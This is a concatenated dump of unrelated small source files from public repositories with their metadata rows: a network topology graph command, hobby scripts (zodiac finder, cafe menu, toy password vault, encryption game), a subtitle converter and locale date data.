except ProgramError, exc:
print >> stderr, exc
except TypeError, exc:
if exc.message.startswith("main() takes"):
print >> stderr, exc
else:
raise
if __name__ == '__main__':
run()
| [
"interestinglythere@gmail.com"
] | interestinglythere@gmail.com |
240b8bac2f0652b595726e36702120548cb29b54 | 48894ae68f0234e263d325470178d67ab313c73e | /inv/management/commands/l3-topology.py | ddbb5633ba7c4973bf42b331a10bd0388bbe360e | [
"BSD-3-Clause"
] | permissive | DreamerDDL/noc | 7f949f55bb2c02c15ac2cc46bc62d957aee43a86 | 2ab0ab7718bb7116da2c3953efd466757e11d9ce | refs/heads/master | 2021-05-10T18:22:53.678588 | 2015-06-29T12:28:20 | 2015-06-29T12:28:20 | 118,628,133 | 0 | 0 | null | 2018-01-23T15:19:51 | 2018-01-23T15:19:51 | null | UTF-8 | Python | false | false | 7,640 | py | # -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## L3 topology
##----------------------------------------------------------------------
## Copyright (C) 2007-2012 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import os
import tempfile
import subprocess
from optparse import make_option
from collections import namedtuple, defaultdict
## Django modules
from django.core.management.base import BaseCommand, CommandError
## NOC modules
from noc.ip.models.vrf import VRF
from noc.sa.models.managedobject import ManagedObject
from noc.inv.models.forwardinginstance import ForwardingInstance
from noc.inv.models.subinterface import SubInterface
from noc.lib.ip import IP
from noc.lib.validators import is_rd
class Command(BaseCommand):
help = "Show L3 topology"
LAYOUT = ["neato", "cicro", "sfdp", "dot", "twopi"]
option_list = BaseCommand.option_list + (
make_option("--afi", dest="afi",
action="store", default="4",
help="AFI (ipv4/ipv6)"),
make_option("--vrf", dest="vrf", action="store",
help="VRF Name/RD"),
make_option("-o", "--out", dest="output", action="store",
help="Save output to file"),
make_option("--core", dest="core", action="store_true",
help="Reduce to network core"),
make_option("--layout", dest="layout", action="store",
default="sfdp",
help="Use layout engine: %s" % ", ".join(LAYOUT)),
make_option("--exclude", dest="exclude", action="append",
help="Exclude prefix from map"),
)
SI = namedtuple("SI", ["object", "interface", "fi", "ip", "prefix"])
IPv4 = "4"
IPv6 = "6"
GV_FORMAT = {
".pdf": "pdf"
}
def handle(self, *args, **options):
# Check AFI
afi = options["afi"].lower()
if afi.startswith("ipv"):
afi = afi[3:]
elif afi.startswith("ip"):
afi = afi[2:]
if afi not in ("4", "6"):
raise CommandError("Invalid AFI: Must be one of 4, 6")
# Check graphviz options
ext = None
if options["output"]:
ext = os.path.splitext(options["output"])[-1]
if ext in self.GV_FORMAT:
# @todo: Check graphvis
pass
elif ext not in ".dot":
raise CommandError("Unknown output format")
if options["layout"] not in self.LAYOUT:
raise CommandError("Invalid layout: %s" % options["layout"])
exclude = options["exclude"] or []
# Check VRF
rd = "0:0"
if options["vrf"]:
try:
vrf = VRF.objects.get(name=options["vrf"])
rd = vrf.rd
except VRF.DoesNotExist:
if is_rd(options["vrf"]):
rd = options["vrf"]
else:
raise CommandError("Invalid VRF: %s" % options["vrf"])
self.mo_cache = {}
self.fi_cache = {}
self.rd_cache = {}
self.p_power = defaultdict(int)
out = ["graph {"]
out += [" node [fontsize=12];"]
out += [" edge [fontsize=8];"]
out += [" overlap=scale;"]
# out += [" splines=true;"]
objects = set()
prefixes = set()
interfaces = list(self.get_interfaces(afi, rd, exclude=exclude))
if options["core"]:
interfaces = [si for si in interfaces if self.p_power[si.prefix] > 1]
for si in interfaces:
o_id = "o_%s" % si.object
p_id = "p_%s" % si.prefix.replace(".", "_").replace(":", "__").replace("/", "___")
if si.object not in objects:
objects.add(si.object)
o = self.get_object(si.object)
if not o:
continue
out += [" %s [shape=box;style=filled;label=\"%s\"];" % (o_id, o.name)]
if si.prefix not in prefixes:
prefixes.add(si.prefix)
out += [" %s [shape=ellipse;label=\"%s\"];" % (p_id, si.prefix)]
out += [" %s -- %s [label=\"%s\"];" % (o_id, p_id, si.interface)]
out += ["}"]
data = "\n".join(out)
if ext is None:
print data
elif ext == ".dot":
with open(options["output"], "w") as f:
f.write(data)
else:
# Pass to grapviz
with tempfile.NamedTemporaryFile(suffix=".dot") as f:
f.write(data)
f.flush()
subprocess.check_call([
options["layout"],
"-T%s" % self.GV_FORMAT[ext],
"-o%s" % options["output"],
f.name
])
def get_interfaces(self, afi, rd, exclude=None):
"""
Returns a list of SI
"""
def check_ipv4(a):
if (a.startswith("127.") or a.startswith("169.254") or
a.endswith("/32") or a.startswith("0.0.0.0")):
return False
else:
return True
def check_ipv6(a):
if a == "::1":
return False
else:
return True
exclude = exclude or []
si_fields = {"_id": 0, "name": 1, "forwarding_instance": 1,
"managed_object": 1}
if afi == self.IPv4:
check = check_ipv4
get_addresses = lambda x: x.get("ipv4_addresses", [])
AFI = "IPv4"
si_fields["ipv4_addresses"] = 1
elif afi == self.IPv6:
check = check_ipv6
get_addresses = lambda x: x.get("ipv6_addresses", [])
AFI = "IPv6"
si_fields["ipv6_addresses"] = 1
else:
raise NotImplementedError()
for si in SubInterface._get_collection().find({"enabled_afi": AFI}, si_fields):
if rd != self.get_rd(si["managed_object"], si.get("forwarding_instance")):
continue
seen = set(exclude)
for a in [a for a in get_addresses(si) if check(a)]:
prefix = str(IP.prefix(a).first)
if prefix in seen:
continue
seen.add(prefix)
self.p_power[prefix] += 1
yield self.SI(si["managed_object"], si["name"],
si.get("forwarding_instance"), a,
prefix)
def get_object(self, o):
"""
Returns ManagedObject instance
"""
mo = self.mo_cache.get(o)
if not mo:
try:
mo = ManagedObject.objects.get(id=o)
except ManagedObject.DoesNotExist:
mo = None
self.mo_cache[o] = mo
return mo
def get_rd(self, object, fi):
rd = self.rd_cache.get((object, fi))
if not rd:
if fi:
f = ForwardingInstance.objects.filter(id=fi).first()
if f:
rd = f.rd
else:
rd = None # Missed data
else:
o = self.get_object(object)
if o:
if o.vrf:
rd = o.vrf.rd
else:
rd = "0:0"
else:
rd = None # Missed data
self.rd_cache[object, fi] = rd
return rd
| [
"dv@nocproject.org"
] | dv@nocproject.org |
f835ecee1a0f433e30a00f11d4e3009d7dfa125e | 77d74e225f172151af23558849faacb8d77cccfd | /zodiac_sign_finder.py | 15c0bd431e2331204e57bb8543f9c1139fecc937 | [] | no_license | balderasdiana/Zodiac-Sign | bc12bbb01b26c13434ac4a02030100160f6f827b | d69a645b74b64b37e7b3e72441a33787b159e412 | refs/heads/master | 2022-11-17T15:43:11.810022 | 2020-07-09T14:04:45 | 2020-07-09T14:04:45 | 266,240,042 | 0 | 1 | null | 2020-07-09T14:04:47 | 2020-05-23T01:22:28 | Python | UTF-8 | Python | false | false | 3,162 | py | # Created by Diana Balderas and Jordan Leich, Original release: 5/17/2020, Updated on 7/8/2020.
# Email jordanleich@gmail.com if you wish to collaborate or work together sometime.
# Instructions: Enter you birth month in lowercase letters and enter your birth date in numbers.
# Imports
import time
import restart
# Main zodiac code finder
def start():
user_month = str(input('In what month were you born? '))
print()
time.sleep(1)
user_date = int(input('What day were you born? '))
print()
time.sleep(1)
if user_date < 1: # Used when a user sets a birth date lower than 1
print("Invalid birth date provided!\n")
time.sleep(2)
restart.restart()
elif user_date > 31: # Used when a user sets a birth date higher than 31
print("Error found! Your birth date is too high!\n")
time.sleep(2)
restart.restart()
months = [
'january',
'february',
'march',
'april',
'june',
'july',
'august',
'september',
'november',
'december',
]
if user_month.lower() in months:
if user_month.lower() == 'december':
user_sign = ('sagittarius' if user_date < 22 else 'capricorn')
results(user_sign)
elif user_month.lower() == 'january':
user_sign = ('capricorn' if user_date < 20 else 'aquarius')
results(user_sign)
elif user_month.lower() == 'february':
user_sign = ('aquarius' if user_date < 19 else 'pisces')
results(user_sign)
elif user_month.lower() == 'march':
user_sign = ('pisces' if user_date < 21 else 'aries')
results(user_sign)
elif user_month.lower() == 'april':
user_sign = ('aries' if user_date < 20 else 'taurus')
results(user_sign)
elif user_month.lower() == 'may':
user_sign = ('taurus' if user_date < 21 else 'gemini')
results(user_sign)
elif user_month.lower() == 'june':
user_sign = ('gemini' if user_date < 21 else 'cancer')
results(user_sign)
elif user_month.lower() == 'july':
user_sign = ('cancer' if user_date < 23 else 'leo')
results(user_sign)
elif user_month.lower() == 'august':
user_sign = ('leo' if user_date < 23 else 'virgo')
results(user_sign)
elif user_month.lower() == 'september':
user_sign = ('virgo' if user_date < 23 else 'libra')
results(user_sign)
elif user_month.lower() == 'october':
user_sign = ('libra' if user_date < 23 else 'scorpio')
results(user_sign)
elif user_month.lower() == 'november':
user_sign = ('scorpio' if user_date < 22 else 'sagittarius')
results(user_sign)
else: # Used if the users birth month is not recognized or found
print("Error found!\n")
time.sleep(2)
restart.restart()
def results(user_sign):
time.sleep(1)
print('Your zodiac sign is a ' + user_sign + '!\n')
time.sleep(2)
restart.restart()
start()
| [
"noreply@github.com"
] | balderasdiana.noreply@github.com |
c876d63d1c3f174c77f59f76300e1d3fced9457f | d8348786332e8d60ae83f7da643efcd545801401 | /png2ass.py | 16b4c487ca72b7ab682c91d6b5b45df325e4cdb9 | [
"MIT"
] | permissive | emako/png2ass | 73deaad0929286899ed3ff201f53b37f717e159f | 77ee424dc032a343d1d3fde7a2946d1ee36af8d6 | refs/heads/master | 2020-04-09T04:26:44.036760 | 2018-12-02T07:25:04 | 2018-12-02T07:25:04 | 160,023,441 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # -*- coding: utf-8 -*-
import sys
from tcaxPy import *
try:
input = sys.argv[1]
except:
print('Error: none input image file!')
sys.exit()
output = input
width = 1280
height = 720
ass_header = """[Script Info]\r
; This script is generated by png2ass powered by TCAX 1.2.0\r
; Welcome to TCAX forum http://tcax.org\r
ScriptType: v4.00+\r
Collisions:Normal\r
PlayResX:{width}\r
PlayResY:{height}\r
Timer:100.0000\r
\r
[V4+ Styles]\r
Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\r
Style: TCMS,Arial,30,&H00FF0000,&HFFFF0000,&H000000FF,&HFF000000,0,0,0,0,100,100,0,0,0,1,0,5,15,15,10,1\r
Style: TCPS,Arial,1,&HFFFFFFFF,&HFFFFFFFF,&HFFFFFFFF,&HFFFFFFFF,0,0,0,0,100,100,0,0,0,0,0,7,0,0,0,1\r
\r
[Events]\r
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\r
\r""".format(width=width, height=height)
data = {
val_OutFile : output,
val_AssHeader : ass_header,
val_ResolutionX : width,
val_ResolutionY : height,
}
def png2ass():
file_name = GetVal(val_OutFile) + '.ass'
ass_header = GetVal(val_AssHeader)
ASS_FILE = CreateAssFile(file_name, ass_header)
ASS_BUF = []
PIX = ImagePix((input))
dx = (GetVal(val_ResolutionX) - PIX[1][0]) / 2 - PIX[0][0] # x middle of the screen
dy = (GetVal(val_ResolutionY) - PIX[1][1]) / 2 - PIX[0][1] # y middle of the screen
## -- pix convert start
initPosX = dx + PIX[0][0]
initPosY = dy + PIX[0][1]
for h in range(PIX[1][1]):
posY = initPosY + h
for w in range(PIX[1][0]):
posX = initPosX + w
idx = 4 * (h * PIX[1][0] + w)
pixR = PIX[2][idx + 0]
pixG = PIX[2][idx + 1]
pixB = PIX[2][idx + 2]
pixA = PIX[2][idx + 3]
if pixA != 0:
ass_main(ASS_BUF, SubL(0, 1000, 0, Pix_Style), pos(posX, posY) + color1(FmtRGB(pixR, pixG, pixB)) + alpha1(255 - pixA), PixPt())
## -- pix convert end
WriteAssFile(ASS_FILE, ASS_BUF) # write the buffer in memory to the file
FinAssFile(ASS_FILE)
if __name__ == "__main__":
tcaxPy_InitData(data)
png2ass() | [
"noreply@github.com"
] | emako.noreply@github.com |
8bbdbcdf581968d290040b5000ecbce9b3daa08b | 9e1f4824c724631208fcc8fe1f16945947630427 | /venv/Scripts/django-admin.py | c486558899b36107b2b8fb7c2efd172340e5a722 | [] | no_license | gilbenhamo/EasyShop | d7596af2db4a06978664579634e5fda58f9cc7b1 | 5839e722d8684ed9dc34a48bebc7caad10b17f87 | refs/heads/master | 2023-07-12T00:06:52.837652 | 2021-01-08T15:25:05 | 2021-01-08T15:25:05 | 664,358,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | #!C:\EasyShop-ziv\venv\Scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"gilbh859@gmail.com"
] | gilbh859@gmail.com |
8a669159d71e65a34188db691932a5319de7f270 | a7d12129e0b36046cfd6f95fbe0842b5bad69f92 | /ArchiveRec/hello_world/urls.py | e3c3cf6a5b3438d4a54525d5b60fbf464498435b | [] | no_license | BenjaminJenney/ArchiveRec | c46fd33085626838d4986388ce4c3a6ee682fda5 | ab11b3f3635c6c220ce9da5abefbbb8f7d9188e8 | refs/heads/main | 2023-08-21T11:21:08.203710 | 2021-10-08T15:25:43 | 2021-10-08T15:25:43 | 415,033,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.urls import path
from hello_world import views
urlpatterns = [
path('', views.hello_world, name='hello_world')
]
| [
"benjenns@gmail.com"
] | benjenns@gmail.com |
703e7427495b97d7a885aa45eea1606e2660b7a2 | 8061b2ce49387b26b51c9634612c837ae3bd38e2 | /main1.py | af7d095de9dec7acd088b9b503ee18b696f531c8 | [] | no_license | Carine-SHS-Digital-Tech/intro-to-github-JardanSus | 3932942159ebda94ab839d8d38087c775756463e | e052f4a2885deb24f756a2ec4e818276f364c70b | refs/heads/main | 2023-06-27T17:47:26.222065 | 2021-08-01T08:54:35 | 2021-08-01T08:54:35 | 379,786,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,086 | py | menu = ["Cappuccino", "Espresso", "Latte", "Iced Coffee"]
prices = [3, 2.25, 2.50, 2.50]
gst = float(0.1)
takeAway = float(0.05)
count = 0
total = 0
x = 0
orderItems = []
orderPrice = []
nextItem = True
choice = input("Hi, welcome to Cafe au Lait\nWould you like takeaway [T] or Dine in [D]? ")
print("Here is the menu:\n ")
print("$3.00 " + menu[0])
print("$2.25 " + menu[1])
print("$2.50 " + menu[2])
print("$2.50 " + menu[3])
print("\nTo complete order, enter [Done] ")
while nextItem:
order = input("Enter Item: ")
if order == "Cappuccino":
qty = int(input("Enter Quantity: "))
orderItems.append(menu[0] + " * " + str(qty))
orderPrice.append(prices[0] * qty)
count = count + 1
total = total + prices[0] * qty
elif order == "Espresso":
qty = int(input("Enter Quantity: "))
orderItems.append(menu[1] + " * " + str(qty))
orderPrice.append(prices[1] * qty)
count = count + 1
total = total + prices[1] * qty
elif order == "Latte":
qty = int(input("Enter Quantity: "))
orderItems.append(menu[2] + " * " + str(qty))
orderPrice.append(prices[2] * qty)
count = count + 1
total = total + prices[2] * qty
elif order == "Iced Coffee":
qty = int(input("Enter Quantity: "))
orderItems.append(menu[3] + " * " + str(qty))
orderPrice.append(prices[3] * qty)
count = count + 1
total = total + prices[3] * qty
elif order == "Done":
nextItem = False
else:
print("Invalid input / item not on menu")
if choice == "T":
total = total + total * takeAway + total * gst
else:
total = total + total * gst
print("Here is your order summary:")
a = 0
subTotal = sum(orderPrice)
while a < count:
print("Item: " + orderItems[a])
print("Price: $" + str(orderPrice[a]))
a = a + 1
print("\nSubtotal: $" + str(sum(orderPrice)))
print("GST: $" + str(subTotal * gst))
print("Surcharge: $" + str(subTotal * takeAway))
print("The total price of your order is: $" + str(total))
| [
"noreply@github.com"
] | Carine-SHS-Digital-Tech.noreply@github.com |
3ff886427d0bbc511c3a10a0eb2bf4b511510cf6 | 89141c20942b9cfd9259693d4e17eb4328c92e1a | /Game/Games/Encrypter/Encrypter_gui.py | a73038f52b2adbe36efc56d8b3153a04ff16f57a | [
"MIT"
] | permissive | AnirbanBanik1998/Modern_Speak_and_Spell | 3647d29fd524a192a1bba3249a937bb138a8e9b4 | 18a00fd137d11f3d52055efc64cc3ae5c715412b | refs/heads/master | 2021-04-15T14:51:18.902173 | 2018-08-30T15:40:23 | 2018-08-30T15:40:23 | 126,737,696 | 6 | 4 | null | null | null | null | UTF-8 | Python | false | false | 8,710 | py | import pygame
import Encrypter
import subprocess
import sys
sys.path.insert(0, "../../../")
from API import recorder, edit
def message(msg, color, width, height, font_size, center=False, bg=None):
'''
Function to display a specific message in a specific position with a specific color.
:param msg: The text to be displayed.
:param color: The font color.
:param width: The horizontal position of the text on the screen.
:param height: The vertical position of the text on the screen.
:param font_size: The font size of the text.
:param center: Boolean value to determine if text will be aligned to the center or not.
:param bg: Sets the background colour of the text on the window. Default value is None.
'''
font = pygame.font.SysFont(None, font_size)
screen_text = font.render(msg, True, color)
if center == True:
text_rect = screen_text.get_rect(center=(width, height))
gameDisplay.blit(screen_text, text_rect)
else:
gameDisplay.blit(screen_text, [width, height])
def check(word, choice):
'''
Performs the same function as that of check() function of class Encrypter..except that the messages are displayed to the GUI rather than being printed out to the console.
:param word: The input word to be operated on.
'''
w = ""
i = 0
m = ""
while i < len(word) and encrypter.counter < 20:
subprocess.call(["espeak", str(20 - encrypter.counter) + " trials left"])
w1 = encrypter.test(w, word[i])
message(m, black, display_width / 2, display_height / 2, 40, True, black)
pygame.display.update()
if w1 is not "-":
w = w1
message(w.upper(), white, display_width / 2, display_height / 2, 40, True)
pygame.display.update()
m = w.upper()
i += 1
else:
message((w + w1).upper(), white, display_width / 2, display_height / 2, 40, True)
pygame.display.update()
m = (w + w1).upper()
if w == word:
subprocess.call(["espeak", "-s", "125", " Good!"])
message("Good", green, display_width / 2, (3 * display_height) / 4, 45, True)
pygame.display.update()
break
if encrypter.counter >= 20:
subprocess.call(["espeak", "-s", "125", " No you are wrong...the answer will be "])
for j in word:
subprocess.call(["espeak", "-s", "100", j])
message("Answer-> " + word, red, display_width / 2, (3 * display_height) / 4, 45, True)
pygame.display.update()
message("Score out of 10: " + str(encrypter.score(w, word, choice=choice)), green, display_width / 2,
(5 * display_height) / 6, 40, True)
pygame.display.update()
def main():
'''
The main block of the program which runs the entire display.
'''
pygame.init() # Initialize pygame
global encrypter
encrypter = Encrypter.Encrypter()
global m, black, white, green, blue, red, display_width, display_height
choice = ""
m = ""
while True:
try:
random_word = encrypter.rand_word()
break
except Exception as e:
print(e)
white = (255, 255, 255)
red = (255, 0, 0)
black = (0, 0, 0)
blue = (0, 0, 255)
green = (0, 255, 0)
global gameDisplay
gameDisplay = pygame.display.set_mode((800, 600)) # Pass a tuple as a parameter
display_width = 800
display_height = 600
pygame.display.set_caption("Encrypter")
pygame.display.update() # Update the specific modification
clock = pygame.time.Clock()
gameExit = False
while not gameExit:
message("Encrypter", blue, display_width / 7, display_height / 7, 50)
pygame.display.update()
while True:
choice = encrypter.choose()
if choice is not "":
break
if choice == "1":
# Runs Encode Game
s = encrypter.rand_int()
hint = encrypter.shift("anirban", s)
with encrypter.lock:
subprocess.call(["espeak", " If anirban is encoded as " + str(hint)])
hint_str = ""
for h in hint:
hint_str = hint_str + h
message("anirban -> " + hint_str, white, display_width / 4, display_height / 4, 30)
pygame.display.update()
encode = encrypter.shift(random_word, s)
with encrypter.lock:
subprocess.call(["espeak", " Then encode " + random_word])
message(random_word + " ->" + " ?", white, display_width / 4, display_height / 3, 30)
pygame.display.update()
encode_str = ""
for h in encode:
encode_str = encode_str + h
check(encode_str, choice)
elif choice == "2":
# Runs Decode Game
s = encrypter.rand_int()
hint = encrypter.shift("anirban", s)
hint_str = ""
for h in hint:
hint_str = hint_str + h
with encrypter.lock:
subprocess.call(["espeak", " If " + str(hint) + "is decoded as anirban"])
message(hint_str + " -> anirban", white, display_width / 4, display_height / 4, 30)
pygame.display.update()
encode = encrypter.shift(random_word, s)
with encrypter.lock:
subprocess.call(["espeak", " Then decode " + str(encode)])
encode_str = ""
for h in encode:
encode_str = encode_str + h
message(encode_str + " ->" + " ?", white, display_width / 4, display_height / 3, 30)
pygame.display.update()
check(random_word, choice)
elif choice == "3":
# Runs Guessing Game to guess the shifting key for arriving at the correct answer
e = ""
s = encrypter.rand_int()
encode = encrypter.shift(random_word, s)
encode_str = ""
for p in encode:
encode_str = encode_str + p
subprocess.call(["espeak", " Guess the shifting key if " + random_word + " is encoded as " + encode_str])
message(random_word + "->" + encode_str, white, display_width / 4, display_height / 4, 40)
pygame.display.update()
message("SHIFTED WORD " + random_word.upper(), white, display_width / 2, display_height / 2, 40, True)
pygame.display.update()
m = "SHIFTED WORD " + random_word.upper()
for k in range(10):
subprocess.call(["espeak", str(10 - k) + " trials left"])
with encrypter.lock:
rec = recorder.Recorder("../../../Language_Models/", "../../../Acoustic_Models/", L_LIB="num",
A_LIB="en-us", TRIALS=1, DECODE=True,
SILENCE=1)
rec.start()
r = open('./test.hyp', 'r')
arr = r.read().split(" ")
num = arr[0]
r.close()
try:
e = encrypter.shift(random_word, int(num))
except Exception as z:
print(z)
message(m.upper(), black, display_width / 2, display_height / 2, 40, True, black)
pygame.display.update()
e_str = ""
for p in e:
e_str = e_str + p
message("SHIFTED WORD " + e_str.upper(), white, display_width / 2, display_height / 2, 40, True)
pygame.display.update()
m = "SHIFTED WORD " + e_str.upper()
if e_str == encode_str:
subprocess.call(["espeak", "-s", "120", " Good!"])
break
elif k == 9:
subprocess.call(["espeak", "-s", "120", " No you are wrong...the answer will be " + str(s)])
message("Answer-> " + str(s), red, display_width / 2, (3 * display_height) / 4, 45, True)
pygame.display.update()
k += 1
message("Score out of 10: " + str(encrypter.score(trials=k, choice=choice)), green, display_width / 2,
(5 * display_height) / 6, 40, True)
pygame.display.update()
else:
message("Wrong Choice", red, display_width / 2, display_height / 2, 45, True)
pygame.display.update()
gameExit = True
clock.tick(20)
subprocess.call(["espeak", "-s", "125", " Options are 1: Resume and 2: Start another game"])
pygame.quit()
quit()
if __name__ == "__main__":
main()
| [
"anirbanbanik17@gmail.com"
] | anirbanbanik17@gmail.com |
a401aaa862e6f2bc65f030853a132d572477afd0 | c9b4afeb20987fa33e0b1c3a5d8b35b6d729308f | /PassVault.py | 07450eb55a60959e85b525a162d3469bffd58859 | [] | no_license | mosheduminer/PassVault | 7931a50764bb9dca57f496231f7eb98e12467de6 | 0050da5f4b0305d908b3cf77e02b7a99ea9995bb | refs/heads/master | 2020-04-22T00:21:58.918460 | 2019-02-11T01:18:31 | 2019-02-11T01:18:31 | 169,977,224 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,515 | py | from os import path
from sys import exit
from time import sleep
class cipher():
def __init__(self, c):
self.c = c
lc = len(c)
self.lc = lc
# test cipher validity
if lc == 0:
self.valid = "no"
else:
self.valid = "yes"
for i in range(lc):
if 31 < ord(c[i]) < 127:
pass
else:
self.valid = "no"
break
def key(self):
if self.valid == "yes":
# conversion of cipher
key = ""
for char in self.c:
i_c = str(ord(char))
key = key + i_c
self.c = key
def check_for_file():
file_status = path.exists(location)
return file_status
def file_create(location):
print("\nNo password file found.\n")
i = input("Would you like to create a password file?"
" Enter \"yes\" or \"no\": ")
if i == "yes":
with open(location, "w") as openf:
openf
else:
terminate(0.5)
def read_file(location, c):
file = open(location, "r")
cipher_text = file.read()
lr = len(cipher_text)
text = ""
# iterate and decrypt cipher_text
for i in range(lr):
text_val = ord(cipher_text[i]) - 31
text_val = text_val + 95 - int(c.c[i % c.lc])
text_val = text_val % 95 + 31
text_char = chr(text_val)
text = f"{text}{text_char}"
# sort accounts alphabetically
text_list = text.split(",")
text_list.sort()
text = ""
for index, item in enumerate(text_list):
text = f"{text}{item} "
return text
def add_to_file(text, c):
# iterate and encrypt text
ln = len(text)
cipher_text = ""
for i in range(ln):
text_val = ord(text[i]) - 31
text_val = text_val + int(c.c[i % c.lc])
text_val = text_val % 95 + 31
text_char = chr(text_val)
cipher_text = f"{cipher_text}{text_char}"
# rewrite file with old and new data
with open(location, "w") as file:
file.write(cipher_text)
def terminate(t):
print(
f"There has been an error. The program will terminate in {t} seconds")
sleep(t)
exit()
location = "password"
file_status = check_for_file()
if file_status is False:
file_create(location)
print("Welcome to PassVault, please enter your cipher.\n")
print("It may be made of numbers, letters or symbols\n")
while True:
c = input("Enter your cipher: ")
c = cipher(c)
if c.valid != "yes":
print("Invalid cipher. Try another one")
else:
break
c.key()
while True:
unciphered = read_file(location, c)
print(unciphered)
request_p = input("Would you like to add more passwords?\n"
"Enter any input to quit, or enter \"yes\": ")
if request_p != "yes":
exit()
else:
account = input("If you have entered \"yes\" by accident,"
" exit the program immediately.\n"
"Otherwise, enter what account"
" you wish to enter a password for: ")
password = input("Enter password: ")
if len(unciphered) > 0:
unciphered = f"{unciphered}{account}:{password},"
else:
unciphered = f"{account}:{password} "
add_to_file(unciphered, c)
| [
"noreply@github.com"
] | mosheduminer.noreply@github.com |
abaaec9d260cef7e59f27576dbc6108f81d1aba5 | 441c4cd6a2a751963afb8a6594576bcf11a63b2d | /lab2/SymbolTable.py | 13e3855711c298f3288cd19d57c339f5ea9af211 | [] | no_license | michlampert/kompilatory | 8404c880746626fdcdd44471489be62a9cb2e996 | 73dc5fdc979bb3b0ab39bbe5d9533231877bf448 | refs/heads/main | 2023-02-17T05:04:20.645435 | 2021-01-13T20:33:25 | 2021-01-13T20:33:25 | 302,153,347 | 0 | 0 | null | 2021-01-13T20:33:26 | 2020-10-07T20:32:23 | Python | UTF-8 | Python | false | false | 855 | py | class VariableSymbol():
def __init__(self, name, ttype):
self.name = name
self.type = ttype
class SymbolTable(object):
def __init__(self, parent, name): # parent scope and symbol table name
self.parent = parent
self.name = name
self.symbols = {}
def put(self, name, symbol): # put variable symbol or fundef under <name> entry
self.symbols[name] = symbol
def get(self, name): # get variable symbol or fundef from <name> entry
if name in self.symbols: return self.symbols[name]
if self.parent: return self.parent.get(name)
return None
def getParentScope(self):
return self.parent
def pushScope(self, name):
new_scope = SymbolTable(self, name)
self = new_scope
def popScope(self):
self = self.parent
| [
"wachtelik@gmail.com"
] | wachtelik@gmail.com |
df3bf69e1052d215786ee3266d66ff9529129bf4 | 174aa0021c10ebe4d7598b44404f8dfcad0cbc24 | /dateparser/data/date_translation_data/ki.py | dc720c347e27c7789baf072713bafc901736f7cb | [
"BSD-3-Clause"
] | permissive | Ronserruya/dateparser | 6789fc84bd548e040975ab693c50362673960571 | 238d0dbc7a03a00c29818e474f28848e100010bc | refs/heads/master | 2022-07-07T09:33:37.849429 | 2020-05-13T07:19:56 | 2020-05-13T07:19:56 | 263,635,745 | 0 | 0 | BSD-3-Clause | 2020-05-13T13:20:15 | 2020-05-13T13:20:15 | null | UTF-8 | Python | false | false | 2,714 | py | # -*- coding: utf-8 -*-
info = {
"name": "ki",
"date_order": "DMY",
"january": [
"njenuarĩ",
"jen"
],
"february": [
"mwere wa kerĩ",
"wkr"
],
"march": [
"mwere wa gatatũ",
"wgt"
],
"april": [
"mwere wa kana",
"wkn"
],
"may": [
"mwere wa gatano",
"wtn"
],
"june": [
"mwere wa gatandatũ",
"wtd"
],
"july": [
"mwere wa mũgwanja",
"wmj"
],
"august": [
"mwere wa kanana",
"wnn"
],
"september": [
"mwere wa kenda",
"wkd"
],
"october": [
"mwere wa ikũmi",
"wik"
],
"november": [
"mwere wa ikũmi na ũmwe",
"wmw"
],
"december": [
"ndithemba",
"dit"
],
"monday": [
"njumatatũ",
"ntt"
],
"tuesday": [
"njumaine",
"nmn"
],
"wednesday": [
"njumatana",
"nmt"
],
"thursday": [
"aramithi",
"art"
],
"friday": [
"njumaa",
"nma"
],
"saturday": [
"njumamothi",
"nmm"
],
"sunday": [
"kiumia",
"kma"
],
"am": [
"kiroko"
],
"pm": [
"hwaĩ-inĩ"
],
"year": [
"mwaka"
],
"month": [
"mweri"
],
"week": [
"kiumia"
],
"day": [
"mũthenya"
],
"hour": [
"ithaa"
],
"minute": [
"ndagĩka"
],
"second": [
"sekunde"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"ira"
],
"0 day ago": [
"ũmũthĩ"
],
"in 1 day": [
"rũciũ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
} | [
"sarthakmadaan5121995@gmail.com"
] | sarthakmadaan5121995@gmail.com |
d46fe004e10c5667c296cf71217f95529c31f646 | c0a34cb6afebe699c55fdef5050b7a3efd0385cf | /media.py | 015fdaee40e02f6683a3d56def5385d891d48db3 | [] | no_license | wonjunee/movie-website | fdf4dbf9953af3e7c820ab3371ca793f44d03e2f | 6656282c2636e5b5e79888faacefde32384f56ba | refs/heads/master | 2020-12-05T08:12:14.925657 | 2016-09-01T15:27:37 | 2016-09-01T15:27:37 | 66,372,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 969 | py | import webbrowser
class Video():
def __init__(self, title, storyline, poster_image_url):
self.title = title
self.storyline = storyline
self.poster_image_url = poster_image_url
class Movie(Video):
""" This class provides a way to store movie related information"""
VALID_RATINGS = ["G", "PG", "PG-13", "R"]
def __init__(self, title, storyline, poster_image_url, trailer, releaseYear, rating, director):
